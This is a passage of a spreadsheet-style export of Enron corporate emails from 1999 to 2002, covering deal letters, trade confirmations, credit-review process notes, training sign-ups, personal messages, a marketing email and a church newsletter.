You agree that IntercontinentalExchange does not make any representations o=_x000D_
r warranties, express or implied, with respect to the data.                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                         =20_x000D_
To become an Exchange Participant or inquire about the indices, please cont=_x000D_
act sales@intcx.com .                                                      =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                =20_x000D_
To unsubscribe from this service, click here unsubscribe .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Copyright IntercontinentalExchange, Inc. 20=_x000D_
01, All Rights Reserved.                                                   =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                      </t>
  </si>
  <si>
    <t>Fri, 4 Aug 2000 01:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pacs</t>
  </si>
  <si>
    <t xml:space="preserve">Here's what I sent to Rusty on Wednesday.  It seemed like an option didn't _x000D_
quite fit, since PACS doesn't have anything to option, strictly speaking._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 08/04/2000 08:30 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kay Mann                           08/02/2000 10:48 AM_x000D_
	_x000D_
_x000D_
To: Rusty Stevens/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Pacs_x000D_
_x000D_
Due to the nature of this deal, I've prepared an LOI with an exclusivity _x000D_
period.  Let me know what you think,_x000D_
_x000D_
_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 10:43:51 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joseph.koothrappally@enron.com'})</t>
  </si>
  <si>
    <t>RE: Hi!</t>
  </si>
  <si>
    <t>Thanks for the note.  I wish you well as you continue to build your business outside Enron.  Unfortunate circumstances here have caused us to make some tough business decisions that impact contractors such as yourself.  I appreciate your hard work over the last several years and the contributions that you made in helping to manage various businesses within Enron.   _x000D_
_x000D_
I am saving your e-mail address and phone number.  There may be an occasion for us to work together again. _x000D_
_x000D_
Best wishes for you and your family.  -Sally _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Koothrappally, Joseph  _x000D_
Sent:	Friday, November 23, 2001 8:08 AM_x000D_
To:	Beck, Sally_x000D_
Subject:	Hi!_x000D_
_x000D_
_x000D_
Sally:_x000D_
_x000D_
It has been a pleasure knowing you and working with you for so long! Thanks for all the confidence you have shown in me all the time. And thanks for the opportunity you have given me to assist your group in several occasions. Thanks for everything! You can always contact me at joseph@bitsofcode.com or at 713-398-0262. Please stay in touch! _x000D_
_x000D_
Best Regards,_x000D_
Joseph Koothrappally_x000D_
http://www.bitsofcode.com</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 10:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Option Agreement and Easement</t>
  </si>
  <si>
    <t>Janice Moore and I have been helping Mitch w a proposal to connect Caledonia _x000D_
to Southern.  There is another project to expand the facility that we are not _x000D_
working on - I think maybe Sheila's group has that one.  Call me or Janice _x000D_
with questions.</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 01:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa@casa-de-clarke.com', 'nmann@erac.com'})</t>
  </si>
  <si>
    <t>Re: This weekend</t>
  </si>
  <si>
    <t xml:space="preserve">YUMMY_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 07/28/2000 08:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Earl and Gaye Hudson" &lt;grogers@wcnet.net&gt; on 07/28/2000 12:33:17 AM_x000D_
To: &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Re: This weekend_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Kay.Mann@enron.com&gt;_x000D_
To: &lt;grogers@wcnet.net&gt;_x000D_
Sent: Thursday, July 27, 2000 3:33 PM_x000D_
Subject: This weekend_x000D_
_x000D_
_x000D_
&gt; Hi Gaye,_x000D_
&gt;_x000D_
&gt; We are looking forward to seeing you and Earl this weekend.  We will have_x000D_
9_x000D_
&gt; for dinner, not counting the 6 year old who will have eaten (although he_x000D_
&gt; will eat a piece of bread, if offered).  I just hate to pay for a real_x000D_
&gt; dinner for him when I know he won't be interested in grown up food._x000D_
&gt;_x000D_
&gt; If it isn't too much trouble, could you email me the menu?_x000D_
&gt;_x000D_
&gt; We will be bringing beer and wine._x000D_
&gt;_x000D_
&gt; See you soon (just not soon enough),_x000D_
&gt;_x000D_
&gt; Kay Mann_x000D_
&gt; 713 973 6325_x000D_
_x000D_
Hi Kay,_x000D_
_x000D_
The menu is as follows:_x000D_
_x000D_
Hors douerves                 Crab Canapes_x000D_
Appetizer                          Mocambo Shrimp_x000D_
Salad                                Smoked Trout on Baby Spring Greens with_x000D_
fresh                                                             lemon_x000D_
vinegarette_x000D_
Sorbet                                Mango_x000D_
Entree                                Filet Mignon (will be cooked medium_x000D_
unless_x000D_
otherwise advised)_x000D_
                                            Duchess Potatoes_x000D_
                                            Honey-Glazed Carrots_x000D_
Dessert                              Almond Apricot Tart_x000D_
                                            Creme Brulee Coffee_x000D_
_x000D_
_x000D_
This is what I wrote down when you and I discussed the menu.   We will put a_x000D_
candle on your father's dessert and I will play "Happy Birthday" while the_x000D_
family sings._x000D_
_x000D_
We are looking forward to having you back again.  If there are any changes,_x000D_
let me know._x000D_
_x000D_
Gaye Hudson_x000D_
_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Aug 2001 06:16:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'karla_dailey@city.palo-alto.ca.us'})</t>
  </si>
  <si>
    <t>RE: Confirms</t>
  </si>
  <si>
    <t>Karla,_x000D_
_x000D_
We are printing the confirms and signing them this morning and will fax them to you soon after.  If a faxed signed copy is not ok, please let me know and we will send you originals overnight._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Dailey, Karla" &lt;karla_dailey@city.palo-alto.ca.us&gt;@ENRON [mailto:IMCEANOTES-+22Dailey+2C+20Karla+22+20+3Ckarla+5Fdailey+40city+2Epalo-alto+2Eca+2Eus+3E+40ENRON@ENRON.com] _x000D_
Sent:	Friday, August 17, 2001 2:55 PM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Cc:	Padilla, Monica_x000D_
Subject:	Confirms_x000D_
_x000D_
Tahnsk you for sending the needed confirmations.  I am told by my risk_x000D_
manager, that I need an Enron signature on each confirm.  Please resend  the_x000D_
confirms for gas post the Transaction Agreement with an Enron signature._x000D_
Thanks.</t>
  </si>
  <si>
    <t>Sat, 31 Mar 2001 02:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'datren.williams@enron.com'})</t>
  </si>
  <si>
    <t>Re: School Teaching</t>
  </si>
  <si>
    <t xml:space="preserve">Datren_x000D_
_x000D_
I shall forward her resume to the principal of my son's old high school_x000D_
and give it to my neighbor who is a teacher at CISD._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Datren Williams@EES_x000D_
03/28/2001 12:54 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: School Teaching_x000D_
_x000D_
Hello Vince, _x000D_
_x000D_
I stopped by to see you today 03/28/01. However, Mrs. Shirley notified me _x000D_
that you were out of the country.  Look, I need another favor.  My wife, whom _x000D_
you met last summer, and I  have been living in The Woodlands about a month _x000D_
now.  We have tried, to no avail, to get her in the local school district as _x000D_
a speech pathologist or a K-6 grade school teacher. She could easily find a _x000D_
teaching job in the Houston Independent School District. However, I would _x000D_
prefer that she taught locally, in The Woodlands.  I need to know if you know _x000D_
of anyone we can contact to get her in The Woodlands School System.  I would _x000D_
greatly appreciate if you could help us out once again.  I am attaching her _x000D_
resume' for your perusal. Thanks A Million Vince!!!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Datren Williams_x000D_
EES x 58654_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Sep 1999 03:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EOL GTC's</t>
  </si>
  <si>
    <t xml:space="preserve">If Debbie is talking about the language she and I discussed late last week, _x000D_
that is new credit language that has not yet gone in to any of the GTC's._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stacy E Dickson_x000D_
09/28/99 09:14 AM_x000D_
To: Debbie R Brackett/HOU/ECT@ECT_x000D_
cc: Mark - ECT Legal Taylor/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT _x000D_
Subject: Re: EOL GTC's  _x000D_
_x000D_
Debbie, _x000D_
_x000D_
I am not sure which language you are referring to.  Some of the GTC's have _x000D_
language providing for the posting of a letter of credit by the counterparty _x000D_
when the Enron entity makes a request to do so.  Mark Taylor drafted this _x000D_
language.  I assume that it is the same as the financial language.  Please _x000D_
let me know this e-mail does not answer your question._x000D_
_x000D_
Stacy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 11:33:41 -0800 (PST)</t>
  </si>
  <si>
    <t>yep_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:33 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
you need company?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:33 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
its working, im going to go smoke_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:32 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
That was my plan!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:32 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
youre killing me_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:32 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
deal_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:31 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
youll have to show me_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:30 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I know a few ways! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:30 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
we can still find a way to have fun_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:30 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
you don't know how much I miss it!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:29 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
too bad no drinking_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:28 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
we'll see about that_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:27 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
not as much as me_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:27 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
ooohhh, I'm excited!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:27 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
youll see_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:27 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
so where are we going to go?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:26 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
ok me too_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:26 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I'm not too sure yet...I'm going to try to leave around 3 or 3:30_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:25 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i dont know what time are you_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:23 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
What time are you leaving today?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 1:23 PM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
so lets go_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 1:18 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
Yes! Believe me, I can't wait!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 11:46 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
early this week i hope_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:30 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
okay, I will...this week! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:29 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
prove it_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:28 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
you are the big cheese to me baby! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:27 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i dont really know what he is going to do, i thought i was always the big cheese_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:26 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
REALLY, where is he going? Are you going to be the big cheese now?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:25 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i am staying also but john is not_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:25 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
no he's staying...what about you?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:24 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
me too, is chris leaving_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:24 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I wish...that would be my dream job! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:23 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
really, so who then, me?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:23 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
yeah, but I don't know for who...I don't think I will be working for Chris. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:22 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
im glad to hear that, so are you going to be doing the same thing_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, January 22, 2002 10:21 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
Not at all...I just now got my offer letter...FINALLY.  What about you? Anything exciting?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, January 22, 2002 10:20 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	_x000D_
_x000D_
anything exciting going on over there</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 07:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sales Practices and Anti-Manipulation Training</t>
  </si>
  <si>
    <t>Please set me up for Thursday at 2:00.  _x000D_
_x000D_
                                    THANK YOU!</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 10:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ziff Energy Group Storage Conference</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Please, register me for this._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/24/2001 _x000D_
05:18 PM ---------------------------_x000D_
_x000D_
_x000D_
Tracy Cummins &lt;Tracy.Cummins@nesanet.org&gt; on 04/23/2001 01:46:01 PM_x000D_
To: Nesa Members &lt;NESAMembers@nesanet.org&gt;_x000D_
cc: Staff &lt;Nesa.Staff@nesanet.org&gt; _x000D_
Subject: Ziff Energy Group Storage Conference_x000D_
_x000D_
_x000D_
NESA / HEA will be a Sponsor of the Ziff Energy Group Gas Storage Conference_x000D_
being held in Houston, Texas on June 22, 2001.  Please take a moment to_x000D_
review the attached information and contact Shelley Soles - Conference_x000D_
Director, Ziff Energy Group, at (403) 234-4285 with questions._x000D_
_x000D_
 &lt;&lt;Email Broadcast #1.doc&gt;&gt;_x000D_
_x000D_
 - Email Broadcast #1.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 22:51:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shorton@enron.com'})</t>
  </si>
  <si>
    <t>Optimize the performance of your PC!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
(For e-mailing list removal information see bottom of e-mail.)	_x000D_
[IMAGE]	_x000D_
[IMAGE]	_x000D_
_x000D_
_x000D_
[IMAGE]		 [IMAGE]  [IMAGE]  Download Power Tweaks    [IMAGE] Power Tweaks is a powerful, easy-to-use, tool that customizes Windows. [IMAGE]  [IMAGE] Fine-tune your PC system for optimal performance [IMAGE] More than 250 updates to your Windows application from security to dial-up connection [IMAGE] Can significantly increase security while speeding up your system [IMAGE] Improves your computer's audio and video capabilities [IMAGE] And much more  [IMAGE] Increase the security, speed and overall performance of your PC, with Power Tweaks. [IMAGE] [IMAGE]  [IMAGE] 	[IMAGE]	_x000D_
_x000D_
_x000D_
[IMAGE]	_x000D_
_x000D_
_x000D_
[IMAGE]	_x000D_
You are receiving this e-mail because you downloaded RealPlayer_x000D_
 or RealJukebox_x000D_
 from Real.com? and indicated a preference to receive product news, updates, and special offers from RealNetworks_x000D_
. If you do not wish to receive e-mails from us in the future, click on the Remove Me link below.	_x000D_
[IMAGE]	_x000D_
Remove Me  | Privacy Policy 	_x000D_
[IMAGE]	_x000D_
RealNetworks, RealPlayer, RealJukebox and Real.com are trademarks or registered trademarks of RealNetworks, Inc. All other companies or products listed herein are trademarks or registered trademarks of their respective owners.	_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Nov 1999 03:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'david.forster@enron.com'})</t>
  </si>
  <si>
    <t>PA REPORT</t>
  </si>
  <si>
    <t xml:space="preserve">After discussing the status of our outstanding PA's with credit we have _x000D_
adjusted the proceess to get us in line with our 3 day turnaround objective.  _x000D_
By close of business 11/19 we should have all PA's received prior to 11/16 _x000D_
processed with a status of: ID mailed, waiting on customer info or Requires _x000D_
Div/Branch Resolution.  The following process will be used moving forward:_x000D_
_x000D_
PA's received from from Initial Mailout Counterparties with Credit reject _x000D_
status (bankruptcy, E rating 10, 11, 12) will be mailed read only id and _x000D_
letter to indicating a need for them to call us to discuss options for _x000D_
getting execute status ( these calls will be forwarded to credit)_x000D_
_x000D_
PA's received from Initial Mailout Counterparties with Credit reject status _x000D_
($0 exposure, no info) will be contacted by PCG to obtain a credit contact, _x000D_
Credit will call credit contact and try to obtain required info.  Once Credit _x000D_
has contacted counterparty and requested info, PA status report will reflect _x000D_
- Waiting on customer info.  Credit will have ownership of moving this issue _x000D_
forward in a timely manner. _x000D_
_x000D_
Credit will give initial mailout counterparties priority over new application _x000D_
requests however the turnaround objective for all PA's remains at three days._x000D_
_x000D_
New applications and PA's will be forwarded to credit immediately upon _x000D_
receipt (unless it is a muni or utility which will be forwarded to legal _x000D_
first).  Credit should not reject a muni or utility for anything other than _x000D_
credit issues.  Legal will address legal and regulatory issues._x000D_
_x000D_
Divisions/Branches with approved parent should have the ability to trade.  _x000D_
Dave Forster is trying to develop a work around for the credit upload issue _x000D_
surrounding division/branches.  Until this issue is resolved the PA report _x000D_
will state Requires Div/Branch Resolution._x000D_
_x000D_
PA's which are completed with execute status will state Execute ID mailed_x000D_
_x000D_
PA's which are completed with read only status will state Read-Only ID mailed_x000D_
_x000D_
PA's which are under credit review will state such on the PA report_x000D_
_x000D_
Please contact me immediately if you have an issue with any of the above at _x000D_
30397._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
---------------------- Forwarded by Bob Shults/HOU/ECT on 11/19/99 08:46 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Lisa Gillette_x000D_
11/18/99 06:35 PM_x000D_
To: Debbie R Brackett/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Tom _x000D_
Moran/HOU/ECT@ECT, Grant Oh/CAL/ECT@ECT, Louise Kitchen/LON/ECT@ECT, Rahil _x000D_
Jafry/LON/ECT@ECT, David Forster/LON/ECT@ECT, Molly Harris/HOU/ECT@ECT, Enron _x000D_
London - EOL Product Control Group/LON/ECT@ECT, Product Control - Houston, _x000D_
Paul Goddard/LON/ECT@ECT, Brad Horn/HOU/ECT@ECT, Bob Bowen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: PA REPORT_x000D_
_x000D_
Hello Everyone,_x000D_
_x000D_
Just wanted to let you know that Carrie Southard and I are working on the PA _x000D_
Report together and she will be sending it to you all sometimes.  I will be _x000D_
out tomorrow so if you have any questions please contact her at x35472._x000D_
_x000D_
Thank you,_x000D_
Lisa Gillette_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 09:19:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.watson@pdq.net'})</t>
  </si>
  <si>
    <t>FW: [ordinarylife] One Family's Story</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  ILY.  SYT.  TGIF.  JTW._x000D_
_x000D_
-----Original Message-----_x000D_
From: clarencekerley [mailto:Bill@bkspeaks.com]_x000D_
Sent: Friday, January 11, 2002 8:45 AM_x000D_
To: ordinarylife@yahoogroups.com_x000D_
Subject: [ordinarylife] One Family's Story_x000D_
_x000D_
_x000D_
ORDINARY LIFE - Thoughts and Ideas To Help You Live a Happier Life_x000D_
_x000D_
======================================_x000D_
_x000D_
PREVIEW for January 13, 2002_x000D_
_x000D_
======================================_x000D_
_x000D_
Dear Folks -_x000D_
_x000D_
   I mentioned to you a few weeks ago that nothing divides the _x000D_
Christian church in the Western world any more than views on how to _x000D_
interpret the Bible. On the one hand there is either the natural or _x000D_
conscious literal approach and, on the other, the mytho-poetic _x000D_
approach. The topics over which various groups within the Christian _x000D_
tradition have the most controversy are views about creation, _x000D_
homosexuality and the historic Jesus._x000D_
_x000D_
   We will have a first-hand opportunity to explore one of these - the _x000D_
issue of homosexuality - this Sunday as a mother and daughter share _x000D_
with us their story._x000D_
_x000D_
   Jennifer Feather grew up in the St. Paul's community. Her mother, _x000D_
SuZanne Feather, has been very active at St. Paul's._x000D_
_x000D_
   The Ordinary Life Gathering will combine with the Point of View _x000D_
Class this Sunday to hear these two women share their experience. About _x000D_
what they will be doing, Jennifer writes this:_x000D_
_x000D_
   "Religion is a fundamentally communal experience. Shared beliefs and _x000D_
rituals form its foundations. However, the practice of our faith is _x000D_
also inextricably bound to our own personal experience. Our individual _x000D_
relationship to God is as important as our communal experience of _x000D_
religion. Our differences from one another make the competing demands _x000D_
of individuality and community evident._x000D_
_x000D_
   "Sexuality has become a divisive issue in the Church precisely _x000D_
because it brings to light these difficulties._x000D_
_x000D_
   "Having grown-up at St. Paul's, the interplay between individual _x000D_
difference and this community has shaped my experience of my faith._x000D_
_x000D_
   "Join me and my mother, SuZanne, as we share with you our story and _x000D_
explore the implications of sexuality for our understanding of _x000D_
religious community and the place of difference within that community."_x000D_
_x000D_
               * * *_x000D_
_x000D_
   We will skip having refreshments at the beginning of our time _x000D_
together this week only._x000D_
_x000D_
   DON'T FORGET - this Sunday only we'll be meeting in the Activities _x000D_
Center._x000D_
_x000D_
   I look forward to seeing you this Sunday._x000D_
_x000D_
Much love,_x000D_
_x000D_
Bill Kerley_x000D_
_x000D_
======================================_x000D_
_x000D_
Ordinary Life is a gathering that provides an opportunity to develop an _x000D_
enlightened heart and an awakened mind to the reality of the present _x000D_
moment._x000D_
_x000D_
The gathering meets on Sunday mornings at 9:45 am in Fondren Hall at _x000D_
St. Paul's UMC - 5501 South Main, Houston, Texas and is taught by Dr. _x000D_
Bill Kerley. If you would like more information -_x000D_
_x000D_
Contact Bill Kerley -_x000D_
_x000D_
E-Mail - Bill@bkspeaks.com_x000D_
Web - www.bkspeaks.com_x000D_
Voice - 713-663-7771_x000D_
Fax - 713-663-6418_x000D_
Mail - 6300 West Loop South, Suite 480 Bellaire, TX 77401_x000D_
======================================_x000D_
If someone has forwarded a copy of this newsletter to you and you would _x000D_
like to subscribe, send a blank e-mail addressed to_x000D_
_x000D_
ordinarylife-subscribe@yahoogroups.com_x000D_
_x000D_
You can access the archives of all the Ordinary Life newsletters by _x000D_
going to _x000D_
_x000D_
http://www.yahoogroups.com/group/ordinarylife_x000D_
_x000D_
You can add someone you know would be interested in receiving these on-_x000D_
line newsletters by sending that information to -_x000D_
_x000D_
Bill@bkspeaks.com_x000D_
_x000D_
I'll make sure they are added immediately!_x000D_
_x000D_
You can unsubscribe to this newsletter by sending an e-mail to_x000D_
_x000D_
ordinarylife-unsubscribe@yahoogroups.com_x000D_
======================================_x000D_
The material in this on-line newsletter is copyrighted. It may be _x000D_
reproduced and printed elsewhere as long as it is not changed in any _x000D_
way and credit is given to this source._x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ _x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 15:09:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Direct Access Application for Rehearing</t>
  </si>
  <si>
    <t>Please forward this to those who agreed to sign on_x000D_
-----Original Message-----_x000D_
From: Dan Douglass [mailto:douglass@energyattorney.com]_x000D_
Sent: Thursday, September 27, 2001 3:06 PM_x000D_
